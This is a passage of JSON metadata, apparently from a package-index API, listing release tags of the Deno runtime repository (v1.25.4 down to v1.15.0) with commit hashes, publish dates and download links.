v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hos